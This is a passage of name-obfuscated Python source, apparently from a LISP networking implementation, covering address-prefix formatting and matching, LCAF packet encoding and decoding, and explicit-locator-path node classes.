IiIiIi11 = self . instance_id + ( 2 ** ( 32 - self . mask_len ) - 1 )
return ( "[{}-{}]" . format ( self . instance_id , IiIiIi11 ) )
if 84 - 84: OoOoOO00 . IiII
IiI = self . print_address ( )
if ( self . is_dist_name ( ) ) : return ( IiI )
if ( self . is_geo_prefix ( ) ) : return ( IiI )
if 50 - 50: O0
OOOooo0OooOoO = IiI . find ( "no-address" )
if ( OOOooo0OooOoO == - 1 ) :
IiI = "{}/{}" . format ( IiI , str ( self . mask_len ) )
else :
IiI = IiI [ 0 : OOOooo0OooOoO ]
if 51 - 51: I1Ii111
return ( IiI )
if 95 - 95: Ii1I / Ii1I * OoO0O00 . OoooooooOO . OoooooooOO * I11i
if 76 - 76: OoooooooOO - Ii1I + IiII % OoOoOO00 / OoooooooOO
def print_prefix_no_iid ( self ) :
IiI = self . print_address_no_iid ( )
if ( self . is_dist_name ( ) ) : return ( IiI )
if ( self . is_geo_prefix ( ) ) : return ( IiI )
return ( "{}/{}" . format ( IiI , str ( self . mask_len ) ) )
if 55 - 55: i11iIiiIii - IiII * OOooOOo + II111iiii . I1ii11iIi11i / O0
if 16 - 16: II111iiii . Oo0Ooo * I1Ii111 + o0oOOo0O0Ooo - i11iIiiIii
def print_prefix_url ( self ) :
if ( self . is_ultimate_root ( ) ) : return ( "0--0" )
IiI = self . print_address ( )
OOOooo0OooOoO = IiI . find ( "]" )
if ( OOOooo0OooOoO != - 1 ) : IiI = IiI [ OOOooo0OooOoO + 1 : : ]
if ( self . is_geo_prefix ( ) ) :
IiI = IiI . replace ( "/" , "-" )
return ( "{}-{}" . format ( self . instance_id , IiI ) )
if 98 - 98: II111iiii - i1IIi - ooOoO0o
return ( "{}-{}-{}" . format ( self . instance_id , IiI , self . mask_len ) )
if 36 - 36: IiII + o0oOOo0O0Ooo
if 81 - 81: OOooOOo / I11i % oO0o + ooOoO0o
def print_sg ( self , g ) :
I111 = self . print_prefix ( )
iIi1i = I111 . find ( "]" ) + 1
g = g . print_prefix ( )
oOoO = g . find ( "]" ) + 1
i1iIiIii = "[{}]({}, {})" . format ( self . instance_id , I111 [ iIi1i : : ] , g [ oOoO : : ] )
return ( i1iIiIii )
if 4 - 4: Ii1I - iII111i + i1IIi - I1Ii111 / iII111i . Oo0Ooo
if 18 - 18: oO0o % iIii1I11I1II1 + ooOoO0o
def hash_address ( self , addr ) :
IiIiI = self . address
iI1Ii11 = addr . address
if 34 - 34: I1IiiI - OoooooooOO . IiII - OOooOOo % IiII
if ( self . is_geo_prefix ( ) ) : IiIiI = self . address . print_geo ( )
if ( addr . is_geo_prefix ( ) ) : iI1Ii11 = addr . address . print_geo ( )
if 19 - 19: IiII + I1ii11iIi11i % Oo0Ooo
if ( type ( IiIiI ) == str ) :
IiIiI = int ( binascii . hexlify ( IiIiI [ 0 : 1 ] ) )
if 32 - 32: OOooOOo
if ( type ( iI1Ii11 ) == str ) :
iI1Ii11 = int ( binascii . hexlify ( iI1Ii11 [ 0 : 1 ] ) )
if 46 - 46: II111iiii . OoO0O00
return ( IiIiI ^ iI1Ii11 )
if 97 - 97: oO0o
if 45 - 45: i11iIiiIii / IiII + OoO0O00
if 55 - 55: Ii1I / II111iiii - oO0o
if 58 - 58: i1IIi . OoooooooOO % iIii1I11I1II1 * o0oOOo0O0Ooo + O0 / oO0o
if 77 - 77: I11i . I1ii11iIi11i
if 92 - 92: i11iIiiIii + I11i % I1IiiI / ooOoO0o
def is_more_specific ( self , prefix ) :
if ( prefix . afi == LISP_AFI_ULTIMATE_ROOT ) : return ( True )
if 28 - 28: i1IIi . I1IiiI
OOOoOo0o0Ooo = prefix . mask_len
if ( prefix . afi == LISP_AFI_IID_RANGE ) :
II1oo0OOOo = 2 ** ( 32 - OOOoOo0o0Ooo )
oOoo00o0 = prefix . instance_id
IiIiIi11 = oOoo00o0 + II1oo0OOOo
return ( self . instance_id in range ( oOoo00o0 , IiIiIi11 ) )
if 11 - 11: OoO0O00 / IiII + IiII
if 4 - 4: Oo0Ooo / O0 * OoO0O00 * Oo0Ooo - Ii1I
if ( self . instance_id != prefix . instance_id ) : return ( False )
if ( self . afi != prefix . afi ) :
if ( prefix . afi != LISP_AFI_NONE ) : return ( False )
if 43 - 43: o0oOOo0O0Ooo
if 61 - 61: o0oOOo0O0Ooo * IiII / I1ii11iIi11i
if 67 - 67: iII111i * OoO0O00 + oO0o - iIii1I11I1II1 / Ii1I - o0oOOo0O0Ooo
if 45 - 45: OoooooooOO % OoOoOO00 / o0oOOo0O0Ooo + I1IiiI
if 32 - 32: OOooOOo + i11iIiiIii
if ( self . is_binary ( ) == False ) :
if ( prefix . afi == LISP_AFI_NONE ) : return ( True )
if ( type ( self . address ) != type ( prefix . address ) ) : return ( False )
IiI = self . address
I1IIiIII111 = prefix . address
if ( self . is_geo_prefix ( ) ) :
IiI = self . address . print_geo ( )
I1IIiIII111 = prefix . address . print_geo ( )
if 86 - 86: ooOoO0o / iII111i . OoooooooOO + I1Ii111 + I1Ii111
if ( len ( IiI ) < len ( I1IIiIII111 ) ) : return ( False )
return ( IiI . find ( I1IIiIII111 ) == 0 )
if 35 - 35: Oo0Ooo + oO0o * o0oOOo0O0Ooo - iIii1I11I1II1 % I1ii11iIi11i * i11iIiiIii
if 56 - 56: iIii1I11I1II1 / I11i
if 78 - 78: i11iIiiIii * OoO0O00 * Ii1I / i1IIi * OOooOOo + o0oOOo0O0Ooo
if 52 - 52: i1IIi % O0
if 59 - 59: II111iiii + I1ii11iIi11i / iII111i . ooOoO0o
if ( self . mask_len < OOOoOo0o0Ooo ) : return ( False )
if 18 - 18: I1Ii111
oo00oOo0o0o = ( prefix . addr_length ( ) * 8 ) - OOOoOo0o0Ooo
OoI1111i1 = ( 2 ** OOOoOo0o0Ooo - 1 ) << oo00oOo0o0o
return ( ( self . address & OoI1111i1 ) == prefix . address )
if 40 - 40: OoOoOO00 / OOooOOo + O0
if 57 - 57: iII111i
def mask_address ( self , mask_len ) :
oo00oOo0o0o = ( self . addr_length ( ) * 8 ) - mask_len
OoI1111i1 = ( 2 ** mask_len - 1 ) << oo00oOo0o0o
self . address &= OoI1111i1
if 94 - 94: i11iIiiIii
if 90 - 90: iII111i + i11iIiiIii + iII111i % I1IiiI % oO0o
def is_exact_match ( self , prefix ) :
if ( self . instance_id != prefix . instance_id ) : return ( False )
O0000O = self . print_prefix ( )
I1iiii1i1II = prefix . print_prefix ( ) if prefix else ""
return ( O0000O == I1iiii1i1II )
if 99 - 99: OoOoOO00 . OoOoOO00 * Oo0Ooo + OoooooooOO . Ii1I . OoooooooOO
if 54 - 54: OOooOOo
def is_local ( self ) :
if ( self . is_ipv4 ( ) ) :
ooO0oOOoOO = lisp_myrlocs [ 0 ]
if ( ooO0oOOoOO == None ) : return ( False )
ooO0oOOoOO = ooO0oOOoOO . print_address_no_iid ( )
return ( self . print_address_no_iid ( ) == ooO0oOOoOO )
if 58 - 58: OoOoOO00 / I1Ii111 % O0
if ( self . is_ipv6 ( ) ) :
ooO0oOOoOO = lisp_myrlocs [ 1 ]
if ( ooO0oOOoOO == None ) : return ( False )
ooO0oOOoOO = ooO0oOOoOO . print_address_no_iid ( )
return ( self . print_address_no_iid ( ) == ooO0oOOoOO )
if 14 - 14: I1IiiI . OOooOOo
return ( False )
if 28 - 28: iII111i / oO0o / iII111i
if 97 - 97: II111iiii + Oo0Ooo
def store_iid_range ( self , iid , mask_len ) :
if ( self . afi == LISP_AFI_NONE ) :
if ( iid == 0 and mask_len == 0 ) : self . afi = LISP_AFI_ULTIMATE_ROOT
else : self . afi = LISP_AFI_IID_RANGE
if 57 - 57: o0oOOo0O0Ooo % OoooooooOO - oO0o * IiII + OoooooooOO
self . instance_id = iid
self . mask_len = mask_len
if 65 - 65: OoooooooOO + OOooOOo - I1Ii111
if 78 - 78: Oo0Ooo * OOooOOo + i11iIiiIii
def lcaf_length ( self , lcaf_type ) :
i1iIii = self . addr_length ( ) + 2
if ( lcaf_type == LISP_LCAF_AFI_LIST_TYPE ) : i1iIii += 4
if ( lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE ) : i1iIii += 4
if ( lcaf_type == LISP_LCAF_ASN_TYPE ) : i1iIii += 4
if ( lcaf_type == LISP_LCAF_APP_DATA_TYPE ) : i1iIii += 8
if ( lcaf_type == LISP_LCAF_GEO_COORD_TYPE ) : i1iIii += 12
if ( lcaf_type == LISP_LCAF_OPAQUE_TYPE ) : i1iIii += 0
if ( lcaf_type == LISP_LCAF_NAT_TYPE ) : i1iIii += 4
if ( lcaf_type == LISP_LCAF_NONCE_LOC_TYPE ) : i1iIii += 4
if ( lcaf_type == LISP_LCAF_MCAST_INFO_TYPE ) : i1iIii = i1iIii * 2 + 8
if ( lcaf_type == LISP_LCAF_ELP_TYPE ) : i1iIii += 0
if ( lcaf_type == LISP_LCAF_SECURITY_TYPE ) : i1iIii += 6
if ( lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE ) : i1iIii += 4
if ( lcaf_type == LISP_LCAF_RLE_TYPE ) : i1iIii += 4
return ( i1iIii )
if 15 - 15: I1ii11iIi11i % I1Ii111 . I1ii11iIi11i - iIii1I11I1II1
if 20 - 20: i1IIi - Ii1I . II111iiii + O0 % oO0o % II111iiii
if 26 - 26: iIii1I11I1II1 - Ii1I / iIii1I11I1II1 . i1IIi - o0oOOo0O0Ooo
if 48 - 48: iII111i . i11iIiiIii - iIii1I11I1II1 / iIii1I11I1II1
if 92 - 92: II111iiii . oO0o - O0 + o0oOOo0O0Ooo * I1ii11iIi11i
if 32 - 32: I1IiiI % OoO0O00
if 71 - 71: OoooooooOO . I11i . I1IiiI
if 27 - 27: i11iIiiIii + Oo0Ooo * I11i / OOooOOo - iII111i
if 42 - 42: ooOoO0o . II111iiii % OoOoOO00 - I11i
if 34 - 34: Ii1I % I1Ii111 % I1ii11iIi11i - IiII
if 89 - 89: IiII
if 64 - 64: OoOoOO00
if 3 - 3: i11iIiiIii / I1Ii111
if 40 - 40: OoooooooOO / o0oOOo0O0Ooo + OoOoOO00
if 73 - 73: OOooOOo / Oo0Ooo
if 80 - 80: OoO0O00 + I1IiiI % i1IIi / I11i % i1IIi * i11iIiiIii
if 27 - 27: OoOoOO00 / I1Ii111 * O0 / I1IiiI - IiII / o0oOOo0O0Ooo
def lcaf_encode_iid ( self ) :
ooOoOoOo = LISP_LCAF_INSTANCE_ID_TYPE
o0ooOo000oo = socket . htons ( self . lcaf_length ( ooOoOoOo ) )
oooo = self . instance_id
i1I1iiiI = self . afi
iiii11I1 = 0
if ( i1I1iiiI < 0 ) :
if ( self . afi == LISP_AFI_GEO_COORD ) :
i1I1iiiI = LISP_AFI_LCAF
iiii11I1 = 0
else :
i1I1iiiI = 0
iiii11I1 = self . mask_len
if 70 - 70: I1ii11iIi11i
if 11 - 11: I1Ii111
if 70 - 70: Ii1I
iIiI1iiI11i = struct . pack ( "BBBBH" , 0 , 0 , ooOoOoOo , iiii11I1 , o0ooOo000oo )
iIiI1iiI11i += struct . pack ( "IH" , socket . htonl ( oooo ) , socket . htons ( i1I1iiiI ) )
if ( i1I1iiiI == 0 ) : return ( iIiI1iiI11i )
if 53 - 53: o0oOOo0O0Ooo * Oo0Ooo % I1IiiI
if ( self . afi == LISP_AFI_GEO_COORD ) :
iIiI1iiI11i = iIiI1iiI11i [ 0 : - 2 ]
iIiI1iiI11i += self . address . encode_geo ( )
return ( iIiI1iiI11i )
if 68 - 68: Oo0Ooo
if 85 - 85: OoOoOO00 - OoO0O00 + Ii1I
iIiI1iiI11i += self . pack_address ( )
return ( iIiI1iiI11i )
if 30 - 30: OoOoOO00 - O0 + iII111i / OoO0O00 . oO0o + iIii1I11I1II1
if 19 - 19: Oo0Ooo . IiII - o0oOOo0O0Ooo / II111iiii . O0 - II111iiii
def lcaf_decode_iid ( self , packet ) :
iiII1iiI = "BBBBH"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 75 - 75: OOooOOo % OoOoOO00 + iIii1I11I1II1 - II111iiii / i1IIi
Oo0OoO00O , ii1I1I1iII , ooOoOoOo , I111II , i1iIii = struct . unpack ( iiII1iiI ,
packet [ : ooo0000oo0 ] )
packet = packet [ ooo0000oo0 : : ]
if 22 - 22: I1Ii111 - OOooOOo * i1IIi
if ( ooOoOoOo != LISP_LCAF_INSTANCE_ID_TYPE ) : return ( None )
if 88 - 88: ooOoO0o + iIii1I11I1II1 + OoO0O00 * I1Ii111 + oO0o
iiII1iiI = "IH"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 39 - 39: ooOoO0o - oO0o + OoOoOO00 - oO0o - Ii1I % I1Ii111
oooo , i1I1iiiI = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
packet = packet [ ooo0000oo0 : : ]
if 100 - 100: OOooOOo * IiII % IiII / o0oOOo0O0Ooo * OoO0O00 % OoOoOO00
i1iIii = socket . ntohs ( i1iIii )
self . instance_id = socket . ntohl ( oooo )
i1I1iiiI = socket . ntohs ( i1I1iiiI )
self . afi = i1I1iiiI
if ( I111II != 0 and i1I1iiiI == 0 ) : self . mask_len = I111II
if ( i1I1iiiI == 0 ) :
self . afi = LISP_AFI_IID_RANGE if I111II else LISP_AFI_ULTIMATE_ROOT
if 12 - 12: I1IiiI
if 32 - 32: I1Ii111
if 35 - 35: O0 + II111iiii + o0oOOo0O0Ooo - OoO0O00 - Ii1I
if 88 - 88: I1ii11iIi11i . O0 - o0oOOo0O0Ooo . I1ii11iIi11i * iII111i * I11i
if 89 - 89: Oo0Ooo - oO0o + O0 / i11iIiiIii
if ( i1I1iiiI == 0 ) : return ( packet )
if 64 - 64: OoO0O00 % OoOoOO00 % I1IiiI - Ii1I / IiII * Ii1I
if 74 - 74: IiII - O0 % OOooOOo % OoooooooOO - I11i
if 4 - 4: i1IIi + OoOoOO00 + iIii1I11I1II1 - i1IIi * i11iIiiIii
if 99 - 99: I1ii11iIi11i - O0 % II111iiii + ooOoO0o % OoO0O00 * Ii1I
if ( self . is_dist_name ( ) ) :
packet , self . address = lisp_decode_dist_name ( packet )
self . mask_len = len ( self . address ) * 8
return ( packet )
if 8 - 8: OOooOOo
if 85 - 85: O0 % OOooOOo . Ii1I
if 74 - 74: I1ii11iIi11i - I1Ii111 + i11iIiiIii / I1Ii111 / OoooooooOO + o0oOOo0O0Ooo
if 23 - 23: Oo0Ooo
if 91 - 91: I1Ii111
if ( i1I1iiiI == LISP_AFI_LCAF ) :
iiII1iiI = "BBBBH"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 59 - 59: i1IIi % OOooOOo
Ii1Ii1Ii , Ooo0000o , ooOoOoOo , ii11Ii1111 , iIIIi1Iii1 = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
if 81 - 81: i11iIiiIii / OoO0O00 * OoOoOO00 % iII111i - iIii1I11I1II1 + I1ii11iIi11i
if 20 - 20: O0 . I1Ii111 * Ii1I * II111iiii
if ( ooOoOoOo != LISP_LCAF_GEO_COORD_TYPE ) : return ( None )
if 66 - 66: Ii1I % OoO0O00 % II111iiii - OOooOOo * o0oOOo0O0Ooo
iIIIi1Iii1 = socket . ntohs ( iIIIi1Iii1 )
packet = packet [ ooo0000oo0 : : ]
if ( iIIIi1Iii1 > len ( packet ) ) : return ( None )
if 33 - 33: OoooooooOO / I11i
Ooo0O00o00 = lisp_geo ( "" )
self . afi = LISP_AFI_GEO_COORD
self . address = Ooo0O00o00
packet = Ooo0O00o00 . decode_geo ( packet , iIIIi1Iii1 , ii11Ii1111 )
self . mask_len = self . host_mask_len ( )
return ( packet )
if 98 - 98: I1ii11iIi11i . Ii1I . iIii1I11I1II1 * I1ii11iIi11i / Ii1I
if 74 - 74: Oo0Ooo * I1Ii111
o0ooOo000oo = self . addr_length ( )
if ( len ( packet ) < o0ooOo000oo ) : return ( None )
if 72 - 72: OoOoOO00 + O0 - IiII * ooOoO0o
packet = self . unpack_address ( packet )
return ( packet )
if 20 - 20: II111iiii % OoOoOO00 * i11iIiiIii
if 68 - 68: IiII / ooOoO0o
if 100 - 100: ooOoO0o / I1IiiI
if 69 - 69: ooOoO0o + OoO0O00 * o0oOOo0O0Ooo - ooOoO0o
if 66 - 66: OoooooooOO / iII111i / I1IiiI % ooOoO0o / OoO0O00 + OOooOOo
if 64 - 64: i1IIi
if 26 - 26: OoOoOO00 / o0oOOo0O0Ooo . OOooOOo + I1IiiI + Ii1I . iII111i
if 89 - 89: I1Ii111 * I1IiiI . i1IIi - iIii1I11I1II1 * I1Ii111
if 5 - 5: OoOoOO00 % i1IIi
if 31 - 31: Oo0Ooo * O0 . OOooOOo . o0oOOo0O0Ooo + OoO0O00 + II111iiii
if 76 - 76: Oo0Ooo + I1IiiI - O0
if 58 - 58: IiII * i1IIi . I1IiiI - iII111i
if 73 - 73: Oo0Ooo . OoOoOO00
if 50 - 50: IiII / o0oOOo0O0Ooo
if 9 - 9: Oo0Ooo - OoO0O00 + iII111i / OoooooooOO
if 52 - 52: O0
if 34 - 34: OoooooooOO + OoOoOO00 - Oo0Ooo . OOooOOo * iIii1I11I1II1
if 93 - 93: i11iIiiIii / Oo0Ooo * OoOoOO00 / ooOoO0o + OoO0O00 * OOooOOo
if 81 - 81: IiII * iII111i + i1IIi + I1Ii111 / OoO0O00
if 83 - 83: oO0o / OoO0O00
if 34 - 34: OoooooooOO - i1IIi * O0
def lcaf_encode_sg ( self , group ) :
ooOoOoOo = LISP_LCAF_MCAST_INFO_TYPE
oooo = socket . htonl ( self . instance_id )
o0ooOo000oo = socket . htons ( self . lcaf_length ( ooOoOoOo ) )
iIiI1iiI11i = struct . pack ( "BBBBHIHBB" , 0 , 0 , ooOoOoOo , 0 , o0ooOo000oo , oooo ,
0 , self . mask_len , group . mask_len )
if 83 - 83: I1IiiI + OoO0O00
iIiI1iiI11i += struct . pack ( "H" , socket . htons ( self . afi ) )
iIiI1iiI11i += self . pack_address ( )
iIiI1iiI11i += struct . pack ( "H" , socket . htons ( group . afi ) )
iIiI1iiI11i += group . pack_address ( )
return ( iIiI1iiI11i )
if 41 - 41: Ii1I + II111iiii . OOooOOo * I1Ii111 / II111iiii
if 32 - 32: Oo0Ooo - Ii1I % o0oOOo0O0Ooo
def lcaf_decode_sg ( self , packet ) :
iiII1iiI = "BBBBHIHBB"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( [ None , None ] )
if 15 - 15: iIii1I11I1II1 * I1ii11iIi11i / ooOoO0o * oO0o % OOooOOo
Oo0OoO00O , ii1I1I1iII , ooOoOoOo , OOOo00o , i1iIii , oooo , O0oO , o0o0OOOOoO , Oo0O0O = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
if 61 - 61: o0oOOo0O0Ooo % OOooOOo % I1IiiI % I1ii11iIi11i % ooOoO0o + i11iIiiIii
packet = packet [ ooo0000oo0 : : ]
if 76 - 76: O0
if ( ooOoOoOo != LISP_LCAF_MCAST_INFO_TYPE ) : return ( [ None , None ] )
if 81 - 81: I11i - o0oOOo0O0Ooo % Ii1I / I1Ii111 * II111iiii
self . instance_id = socket . ntohl ( oooo )
i1iIii = socket . ntohs ( i1iIii ) - 8
if 40 - 40: OoO0O00 . i11iIiiIii
if 36 - 36: o0oOOo0O0Ooo * iII111i / I1ii11iIi11i % i1IIi % I1ii11iIi11i + i11iIiiIii
if 24 - 24: I1Ii111 / ooOoO0o - i11iIiiIii
if 32 - 32: II111iiii * Ii1I . ooOoO0o * Oo0Ooo - I1ii11iIi11i % I11i
if 96 - 96: Ii1I / OOooOOo / O0
iiII1iiI = "H"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( [ None , None ] )
if ( i1iIii < ooo0000oo0 ) : return ( [ None , None ] )
if 8 - 8: iII111i + OOooOOo / I1ii11iIi11i . iII111i
i1I1iiiI = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] ) [ 0 ]
packet = packet [ ooo0000oo0 : : ]
i1iIii -= ooo0000oo0
self . afi = socket . ntohs ( i1I1iiiI )
self . mask_len = o0o0OOOOoO
o0ooOo000oo = self . addr_length ( )
if ( i1iIii < o0ooOo000oo ) : return ( [ None , None ] )
if 45 - 45: i1IIi
packet = self . unpack_address ( packet )
if ( packet == None ) : return ( [ None , None ] )
if 28 - 28: iII111i
i1iIii -= o0ooOo000oo
if 28 - 28: i1IIi - iII111i + o0oOOo0O0Ooo / Oo0Ooo * oO0o
if 8 - 8: ooOoO0o + OOooOOo * ooOoO0o / i1IIi . I1ii11iIi11i
if 4 - 4: Ii1I - Oo0Ooo . i1IIi + iIii1I11I1II1
if 28 - 28: O0 / ooOoO0o / IiII - I11i + IiII + OoO0O00
if 84 - 84: Oo0Ooo + OoOoOO00 / iII111i . I1ii11iIi11i
iiII1iiI = "H"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( [ None , None ] )
if ( i1iIii < ooo0000oo0 ) : return ( [ None , None ] )
if 26 - 26: Oo0Ooo
i1I1iiiI = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] ) [ 0 ]
packet = packet [ ooo0000oo0 : : ]
i1iIii -= ooo0000oo0
oo0oOooo0O = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
oo0oOooo0O . afi = socket . ntohs ( i1I1iiiI )
oo0oOooo0O . mask_len = Oo0O0O
oo0oOooo0O . instance_id = self . instance_id
o0ooOo000oo = self . addr_length ( )
if ( i1iIii < o0ooOo000oo ) : return ( [ None , None ] )
if 61 - 61: Ii1I * oO0o * i11iIiiIii + OoO0O00
packet = oo0oOooo0O . unpack_address ( packet )
if ( packet == None ) : return ( [ None , None ] )
if 43 - 43: OoO0O00 * OoO0O00 * oO0o
return ( [ packet , oo0oOooo0O ] )
if 24 - 24: oO0o
if 77 - 77: i11iIiiIii - I1Ii111 - I1ii11iIi11i * Oo0Ooo / i11iIiiIii
def lcaf_decode_eid ( self , packet ) :
iiII1iiI = "BBB"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( [ None , None ] )
if 79 - 79: Oo0Ooo % Oo0Ooo . oO0o + ooOoO0o * iII111i * I11i
if 87 - 87: o0oOOo0O0Ooo + OoOoOO00 % o0oOOo0O0Ooo + I1IiiI
if 89 - 89: II111iiii
if 41 - 41: iIii1I11I1II1
if 26 - 26: Oo0Ooo / i1IIi + Oo0Ooo
OOOo00o , Ooo0000o , ooOoOoOo = struct . unpack ( iiII1iiI ,
packet [ : ooo0000oo0 ] )
if 76 - 76: I1ii11iIi11i * i1IIi % oO0o
if ( ooOoOoOo == LISP_LCAF_INSTANCE_ID_TYPE ) :
return ( [ self . lcaf_decode_iid ( packet ) , None ] )
elif ( ooOoOoOo == LISP_LCAF_MCAST_INFO_TYPE ) :
packet , oo0oOooo0O = self . lcaf_decode_sg ( packet )
return ( [ packet , oo0oOooo0O ] )
elif ( ooOoOoOo == LISP_LCAF_GEO_COORD_TYPE ) :
iiII1iiI = "BBBBH"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 80 - 80: i1IIi * II111iiii . O0 % I1ii11iIi11i / ooOoO0o
Ii1Ii1Ii , Ooo0000o , ooOoOoOo , ii11Ii1111 , iIIIi1Iii1 = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
if 58 - 58: I1IiiI * I1ii11iIi11i - i1IIi % I1Ii111 % O0
if 24 - 24: I11i + I11i % I11i
if ( ooOoOoOo != LISP_LCAF_GEO_COORD_TYPE ) : return ( None )
if 63 - 63: i11iIiiIii + iIii1I11I1II1 / oO0o % IiII - O0
iIIIi1Iii1 = socket . ntohs ( iIIIi1Iii1 )
packet = packet [ ooo0000oo0 : : ]
if ( iIIIi1Iii1 > len ( packet ) ) : return ( None )
if 21 - 21: II111iiii
Ooo0O00o00 = lisp_geo ( "" )
self . instance_id = 0
self . afi = LISP_AFI_GEO_COORD
self . address = Ooo0O00o00
packet = Ooo0O00o00 . decode_geo ( packet , iIIIi1Iii1 , ii11Ii1111 )
self . mask_len = self . host_mask_len ( )
if 89 - 89: OOooOOo % i11iIiiIii * OoOoOO00 % oO0o / O0 * i1IIi
return ( [ packet , None ] )
if 16 - 16: IiII
if 42 - 42: i1IIi / Ii1I * I1ii11iIi11i
if 9 - 9: I11i % i1IIi / i1IIi / OoO0O00
if 46 - 46: I1Ii111 * II111iiii + II111iiii * O0 % II111iiii
if 37 - 37: OOooOOo . iIii1I11I1II1 / O0 . ooOoO0o + OOooOOo - OoooooooOO
if 96 - 96: I1Ii111 / oO0o . I1ii11iIi11i % I1IiiI * OOooOOo
class lisp_elp_node ( object ) :
def __init__ ( self ) :
self . address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . probe = False
self . strict = False
self . eid = False
self . we_are_last = False
if 99 - 99: i11iIiiIii - I1Ii111
if 4 - 4: o0oOOo0O0Ooo - i11iIiiIii . iIii1I11I1II1 . OOooOOo % IiII
def copy_elp_node ( self ) :
oo0o = lisp_elp_node ( )
oo0o . copy_address ( self . address )
oo0o . probe = self . probe
oo0o . strict = self . strict
oo0o . eid = self . eid
oo0o . we_are_last = self . we_are_last
return ( oo0o )
if 68 - 68: I11i / iII111i - IiII . iIii1I11I1II1 / o0oOOo0O0Ooo
if 54 - 54: II111iiii * I1IiiI
if 49 - 49: I1ii11iIi11i
class lisp_elp ( object ) :
def __init__ ( self , name ) :
self . elp_name = name
self . elp_nodes = [ ]
self . use_elp_node = None
self . we_are_last = False
if 31 - 31: o0oOOo0O0Ooo - OoOoOO00 + I1ii11iIi11i . oO0o - O0
if 61 - 61: I1ii11iIi11i * II111iiii . i1IIi
def copy_elp ( self ) :
I1iI1 = lisp_elp ( self . elp_name )
I1iI1 . use_elp_node = self . use_elp_node
I1iI1 . we_are_last = self . we_are_last
for oo0o in self . elp_nodes :
I1iI1 . elp_nodes . append ( oo0o . copy_elp_node ( ) )
if 60 - 60: OoooooooOO % ooOoO0o * i11iIiiIii * OoooooooOO % IiII
return ( I1iI1 )
if 15 - 15: oO0o
if 40 - 40: I1Ii111
def print_elp ( self , want_marker ) :
iIII1Iiii = ""
for oo0o in self . elp_nodes :
oooO0OO0 = ""
if ( want_marker ) :
if ( oo0o == self . use_elp_node ) :
oooO0OO0 = "*"
elif ( oo0o . we_are_last ) :
oooO0OO0 = "x"
if 54 - 54: I1Ii111 % OoO0O00 - OoooooooOO
if 96 - 96: IiII
iIII1Iiii += "{}{}({}{}{}), " . format ( oooO0OO0 ,
oo0o . address . print_address_no_iid ( ) ,
"r" if oo0o . eid else "R" , "P" if oo0o . probe else "p" ,
"S" if oo0o . strict else "s" )
if 31 - 31: Ii1I + O0 - OOooOOo * O0 * I11i
return ( iIII1Iiii [ 0 : - 2 ] if iIII1Iiii != "" else "" )
if 53 - 53: I1ii11iIi11i + i11iIiiIii / iIii1I11I1II1 + OoooooooOO + IiII * I1IiiI
if 16 - 16: i11iIiiIii - oO0o . i11iIiiIii + OoO0O00 + i11iIiiIii
def select_elp_node ( self ) :
OOO0O00oo , iII1Ii1IiiIii , ooO000OO = lisp_myrlocs
OOOooo0OooOoO = None
if 93 - 93: OoOoOO00
for oo0o in self . elp_nodes :
if ( OOO0O00oo and oo0o . address . is_exact_match ( OOO0O00oo ) ) :
OOOooo0OooOoO = self . elp_nodes . index ( oo0o )
break
if 48 - 48: i1IIi
if ( iII1Ii1IiiIii and oo0o . address . is_exact_match ( iII1Ii1IiiIii ) ) :
OOOooo0OooOoO = self . elp_nodes . index ( oo0o )
break
if 22 - 22: iII111i / OoO0O00 * OOooOOo + I11i
if 84 - 84: IiII * IiII * o0oOOo0O0Ooo
if 17 - 17: II111iiii * I1IiiI + II111iiii + I1IiiI % I11i * oO0o
if 51 - 51: I1IiiI
if 35 - 35: OOooOOo % oO0o
if 73 - 73: II111iiii / i11iIiiIii
if 91 - 91: OOooOOo
if ( OOOooo0OooOoO == None ) :
self . use_elp_node = self . elp_nodes [ 0 ]
oo0o . we_are_last = False
return
if 92 - 92: o0oOOo0O0Ooo % o0oOOo0O0Ooo + I1IiiI
if 35 - 35: oO0o + iII111i + I11i - I1ii11iIi11i - ooOoO0o - OOooOOo
if 77 - 77: OoooooooOO + OoooooooOO / oO0o * o0oOOo0O0Ooo / I11i
if 86 - 86: I1IiiI % IiII - IiII
if 1 - 1: o0oOOo0O0Ooo + OoOoOO00 / OOooOOo % IiII
if 16 - 16: IiII . I11i * O0 + OoooooooOO
if ( self . elp_nodes [ - 1 ] == self . elp_nodes [ OOOooo0OooOoO ] ) :
self . use_elp_node = None
oo0o . we_are_last = True
return
if 37 - 37: OoO0O00 . i11iIiiIii - i11iIiiIii % I1Ii111 + II111iiii * i11iIiiIii
if 83 - 83: OOooOOo % O0 - I11i . Ii1I % IiII
if 45 - 45: I11i % OoO0O00
if 18 - 18: Ii1I / Ii1I * IiII
if 33 - 33: ooOoO0o
self . use_elp_node = self . elp_nodes [ OOOooo0OooOoO + 1 ]
return
if 14 - 14: Oo0Ooo % I1Ii111 % ooOoO0o . oO0o * iIii1I11I1II1 . I1ii11iIi11i
if 50 - 50: O0 * i11iIiiIii / iIii1I11I1II1 . I11i + i11iIiiIii
if 68 - 68: oO0o + o0oOOo0O0Ooo * iIii1I11I1II1 / i1IIi
class lisp_geo ( object ) :
def __init__ ( self , name ) :
self . geo_name = name
self . latitude = 0xffffffff
